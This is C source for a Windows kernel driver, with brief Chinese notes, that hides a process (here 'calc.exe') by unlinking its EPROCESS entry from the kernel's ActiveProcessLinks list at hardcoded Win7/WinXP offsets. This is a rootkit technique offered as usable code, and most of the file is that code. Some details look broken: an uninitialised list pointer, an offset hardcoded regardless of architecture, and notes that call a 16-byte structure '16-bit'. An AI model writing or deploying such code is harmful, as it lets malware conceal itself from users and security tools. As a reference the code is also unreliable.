1 #ifndef CXX_HIDEPROCESS_H 2 # include "HideProcess.h" 3 #endif 4 5 6 7 #ifdef _WIN64 8 #define ActiveProcessLinksOffset_EPROCESS 0x188 9 #define ImageFileNameOffset_EPROCESS 0x2e0 10 #else 11 #define ActiveProcessLinksOffset_EPROCESS 0x088 12 #define ImageFileNameOffset_EPROCESS 0x174 13 #endif 14 15 16 17 18 19 20 NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegisterPath) 21 { 22 23 //卸载当前驱动例程 24 DriverObject->DriverUnload = UnloadDriver; 25 HideProcess("calc.exe"); 26 return STATUS_SUCCESS; 27 } 28 29 VOID UnloadDriver(PDRIVER_OBJECT DriverObject) 30 { 31 32 } 33 34 VOID HideProcess(char* szProcessName) 35 { 36 37 PLIST_ENTRY ListEntry = NULL; 38 PEPROCESS EProcess = NULL; 39 char* szName = NULL; 40 PEPROCESS TravelEProcess = NULL; 41 PEPROCESS BadEProcess = NULL; 42 EProcess = IoGetCurrentProcess(); // System.exe 43 44 if (szProcessName==NULL) 45 { 46 return; 47 } 48 if (EProcess==NULL) 49 { 50 return; 51 } 52 TravelEProcess = EProcess; 53 54 55 BadEProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)EProcess+ActiveProcessLinksOffset_EPROCESS+8)))-0x188); 56 57 do 58 { 59 60 if (TravelEProcess!=BadEProcess) 61 { 62 szName = (char*)((ULONG_PTR)TravelEProcess+ImageFileNameOffset_EPROCESS); //Next 63 DbgPrint("%s ",szName); 64 65 if (strstr(szName,szProcessName)!=NULL) 66 { 67 RemoveEntryList(ListEntry); // 68 69 break; 70 } 71 } 72 73 TravelEProcess = (PEPROCESS)((*(ULONG_PTR*)((ULONG_PTR)TravelEProcess+ActiveProcessLinksOffset_EPROCESS))-ActiveProcessLinksOffset_EPROCESS); 74 ListEntry = (PLIST_ENTRY)((ULONG_PTR)TravelEProcess+ActiveProcessLinksOffset_EPROCESS); 75 }while (TravelEProcess!=EProcess); 76 }
使用断链操作隐藏进程
win7:
0x188 处 _LIST_ENTRY 一个16位的结构体
0x2e0处存储进程名称
winxp同理